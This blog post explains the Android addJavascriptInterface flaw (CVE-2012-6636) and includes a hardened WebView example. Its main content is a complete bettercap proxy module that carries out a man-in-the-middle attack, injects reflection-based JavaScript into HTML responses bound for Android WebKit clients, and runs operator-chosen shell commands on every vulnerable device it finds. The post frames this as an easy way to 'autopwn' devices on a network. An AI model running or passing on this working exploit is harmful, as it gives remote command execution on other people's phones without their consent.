
Autopwn every Android < 4.2 device on your network using BetterCap and the addJavascriptInterface vulnerability.

Recently I've been playing with Android's WebView-based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting is the addJavascriptInterface vulnerability (CVE-2012-6636), which affects every device running a version older than Android 4.2.

NOTE

The original title of this post was "Autopwn every Android device on your network using BetterCap and the addJavascriptInterface vulnerability", and some people pointed out that it was misleading, since "every Android" != "every Android < 4.2". I totally agree with them; it wasn't intentional. The point of this post was not to show some uber 0day technique, but just to show how easy it is to use bettercap to exploit this type of vulnerability.

There's an excellent post about this vulnerability; long story short, if an app uses a WebView UI control and declares a custom JavaScript interface for it like so:

import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebView;

public class WebViewGUI extends Activity {
    WebView mWebView;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        mWebView.getSettings().setJavaScriptEnabled(true);
        // On Android < 4.2 every public method of the bridged object,
        // including getClass() inherited from java.lang.Object, becomes
        // callable from page script as window.jsinterface.
        mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
        mWebView.loadUrl("file:///android_asset/www/index.html");
        setContentView(mWebView);
    }

    final class JavaScriptInterface {
        JavaScriptInterface() { }

        public String getSomeString() {
            return "string";
        }
    }
}
you can inject some special JavaScript into that page and make the device execute any shell command you want.
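For comparison, here is a hardened form of the same activity. This is an added example and not code from the original post or from bettercap; the class, method and asset names are assumptions. Two facts drive its shape: Android 4.2 (API 17) limits the bridge to methods annotated with @JavascriptInterface, but only when the app's targetSdkVersion is 17 or higher, and on devices older than 4.2 the annotation changes nothing, so the only effective mitigation there is not to register a bridge at all. Note also that the proxy injection described in this post only reaches cleartext HTTP responses; a page served over HTTPS with a valid certificate cannot be rewritten by a transparent proxy, so loading bridge-bearing WebViews only from bundled assets or https:// URLs removes the MITM delivery path.

```java
import android.annotation.SuppressLint;
import android.app.Activity;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;

// Hardened counterpart of WebViewGUI (added example; names are assumptions).
// Assumes the manifest declares targetSdkVersion >= 17.
public class HardenedWebViewGUI extends Activity {
    WebView mWebView;

    @SuppressLint("SetJavaScriptEnabled")
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        WebSettings settings = mWebView.getSettings();
        settings.setJavaScriptEnabled(true);
        // Block file:// access from page script; bundled assets under
        // file:///android_asset remain loadable.
        settings.setAllowFileAccess(false);

        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            // API 17+ with targetSdkVersion >= 17: only methods carrying
            // @JavascriptInterface are visible to page script, so getClass()
            // and the rest of java.lang.Object cannot be reached.
            mWebView.addJavascriptInterface(new SafeInterface(), "jsinterface");
        } else {
            // Android < 4.2 exposes every public method of a bridged object,
            // so no bridge is registered here. Android 3.0 to 4.1 also ship
            // a default bridge named searchBoxJavaBridge_, removable on API 11+.
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) {
                mWebView.removeJavascriptInterface("searchBoxJavaBridge_");
            }
        }

        // A bundled asset (or an https:// URL) keeps the page out of reach
        // of a cleartext HTTP man-in-the-middle.
        mWebView.loadUrl("file:///android_asset/www/index.html");
        setContentView(mWebView);
    }

    static final class SafeInterface {
        // The only method callable as window.jsinterface.getSomeString()
        // on a hardened build.
        @JavascriptInterface
        public String getSomeString() {
            return "string";
        }

        // Not annotated: invisible to page script on API 17+ with
        // targetSdkVersion >= 17.
        public String internalHelper() {
            return "not exposed";
        }
    }
}
```

The SDK_INT branch is the part that matters for the devices this post targets: on anything below 4.2 the annotation is ignored, so the page must simply not get a bridge, and whatever the bridge used to provide has to be done another way (for example by handling a custom URL scheme in a WebViewClient).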

In this post I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap; for this purpose I wrote the AndroidPwn transparent proxy module.

class AndroidPwn < BetterCap::Proxy::Module
  @@command = nil
  # JavaScript injected into matching pages; COMMAND_HERE is replaced with
  # the value of --command.
  @@payload = "<script>\n" +
              "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
              "for(i in top) {\n" +
              "  try {\n" +
              "    top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(command);\n" +
              "    break;\n" +
              "  }\n" +
              "  catch(e) {}\n" +
              "}\n" +
              "</script>"

  def self.on_options(opts)
    opts.separator ""
    opts.separator "AndroidPwn Proxy Module Options:"
    opts.separator ""

    opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
      @@command = v.strip
      # Escape single quotes so the command survives inside the JS literal.
      @@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
    end
  end

  def initialize
    raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
  end

  def on_request( request, response )
    if is_exploitable?( request, response )
      BetterCap::Logger.info ""
      BetterCap::Logger.info "Pwning Android Device :".red
      BetterCap::Logger.info "  URL   : http://#{request.host}#{request.url}"
      BetterCap::Logger.info "  AGENT : #{request.headers['User-Agent']}"
      BetterCap::Logger.info ""

      response.body.sub!( '</head>', "</head>#{@@payload}" )
    end
  end

  private

  # Only successful HTML responses going back to an Android WebKit client
  # are modified.
  def is_exploitable?(req,res)
    req.headers.has_key?('User-Agent') and \
    req.headers['User-Agent'].include?("Android") and \
    req.headers['User-Agent'].include?("AppleWebKit") and \
    res.content_type =~ /^text\/html.*/ and \
    res.code == '200'
  end
end

Leave it running and it will automatically perform a man-in-the-middle attack on your network and execute the command(s) you've chosen on every Android device it finds.
